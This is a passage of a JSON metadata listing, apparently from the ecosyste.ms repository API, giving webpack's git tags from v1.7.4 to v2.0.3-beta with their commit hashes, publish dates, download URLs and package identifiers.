dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v